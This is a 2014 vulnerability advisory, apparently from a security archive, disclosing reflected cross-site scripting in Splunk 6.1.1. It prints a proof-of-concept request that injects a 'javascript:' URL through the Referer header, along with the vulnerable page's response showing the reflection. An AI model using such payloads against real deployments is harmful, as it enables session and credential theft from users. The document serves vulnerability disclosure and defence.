Splunk 6.1.1 Cross Site Scripting

2014.05.28
Credit: Asheesh Anaconda
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

======================================== Splunk Version v6.1.1 cross-site scripting (XSS) Vulnerability ========================================= #Date- 27/5/2014 # code by Asheesh kumar Mani Tripathi # Credit by Asheesh Anaconda #Vulnerbility Splunk is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. #Impact A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities ========================================= Request ========================================== GET /en-US/app/ HTTP/1.1 Referer: javascript:prompt(1111); User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36 Cookie: session_id_8000=9961be37412131609c9c4942a7bca65cc5110e6c; cval=1992808981; uid=C39F57A0-4BFB-4CD7-AAA1-4FD388E15923 Host: 192.168.1.3:8000 Connection: Keep-alive Accept-Encoding: gzip,deflate Accept: */* ========================================= Response ========================================== <html xmlns="http://www.w3.org/1999/xhtml" xmlns:splunk="http://www.splunk.com/xhtml-extensions/1.0" xml:lang="en"> <head> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <link rel="shortcut icon" href="/en-US/static/@207789/img/favicon.ico" /> <title>The path '/en-US/app/' was not found. - Splunk</title> <style> * { margin: 0; padding: 0; } body { font-family: helvetica, arial, sans-serif; color: #333; padding: 20px; } p,pre { margin-bottom: 1em; font-size: .8em; } .status { font-size: .7em; color: #999; margin-bottom: 1em; } .msg { margin-bottom: 1em; font-size: 1.4em;} pre { font-family: Monaco,Courier Bold,Courier New,monospace; font-size: .7em;background-color: #eee; padding: 5px;} #toggle { font-size: .8em; margin-bottom: 1em; } .byline { color: #555; } .byline span { font-weight: bold; line-height: 1.4em; } hr { height: 1px; background-color: #ccc; border: 0; margin: 20px 0 10px; } h2 { font-size: 1em; margin-bottom: 1em; } table { border-collapse: collapse; } td { padding: 2px; } td.k { font-family: helvetica, arial, sans-serif; font-weight: bold; } #debug { display: none; } #crashes { margin: 20px 0; padding: 10px; border: 1px solid #800; } #crashes dt { font-size: 12px; margin-bottom: 5px; } #crashes dd { white-space: pre; background: #f2f2f2; padding: 10px; margin-left: 20px; display: none; font: 10px Monaco,Courier Bold,Courier New,monospace; } </style> <script> function toggle(what) { what = document.getElementById(what); if (what.style.display == 'block') { what.style.display = 'none'; } else { what.style.display = 'block'; } } </script> </head> <body> <p class="status">404 Not Found</p> <p class="homelink"><a href="/">Return to Splunk home page</a></p> <h1 class="msg">The path '/en-US/app/' was not found.</h1> <a href="/en-US/app/search/search?q=index%3D_internal%20host%3D%22admin-PC%22%20source%3D%2Aweb_service.log%20log_level%3DERROR%20requestid%3D538456422b3c01ef0" target="_blank">View more information about your request (request ID = 538456422b3c01ef0) in Search</a> <br /> <br /> <p>This page was linked to from <a href="javascript:prompt(1111);">javascript:prompt(1111);</a>.</p> <br /> <br /> [... Redacted for Brevity ...]


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top